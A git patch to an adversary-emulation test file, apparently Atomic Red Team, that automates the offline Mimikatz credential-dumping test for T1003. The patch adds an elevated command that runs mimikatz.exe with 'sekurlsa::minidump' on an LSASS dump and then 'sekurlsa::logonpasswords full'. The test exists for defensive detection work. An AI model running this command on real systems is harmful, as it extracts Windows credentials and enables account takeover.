From fc060f9e92f483321dceebe2e5b7f784262a394d Mon Sep 17 00:00:00 2001
From: Mr B0b <6248411+Mr-B0b@users.noreply.github.com>
Date: Mon, 30 Dec 2019 16:18:57 +0100
Subject: [PATCH] Improve test 7 (Offline Mimikatz) for T1003 that performs
 Credential Dumping (#760)

---
 atomics/T1003/T1003.yaml | 22 ++++++++++------------
 1 file changed, 10 insertions(+), 12 deletions(-)

diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 246ca7e1..0c01166a 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -137,22 +137,20 @@ atomic_tests:
     - windows
 
   input_arguments:
+    mimikatz_binary_path:
+      description: Path of the Mimikatz binary
+      type: string
+      default: $PathToAtomicsFolder\T1003\bin\mimikatz.exe
     input_file:
-      description: Path where resulting dump should be placed
+      description: Path of the Lsass dump
       type: Path
-      default: lsass_dump.dmp
+      default: C:\Windows\Temp\lsass_dump.dmp
 
   executor:
-    name: manual
-    steps: |
-      1. Open Mimikatz:
-        Execute `mimikatz` at a command prompt.
-
-      2. Select a Memory Dump:
-        Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
-
-      3. Obtain Credentials:
-        Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+    name: command_prompt
+    elevation_required: true
+    command: |
+      #{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
 
 - name: Dump Active Directory Database with NTDSUtil
   description: |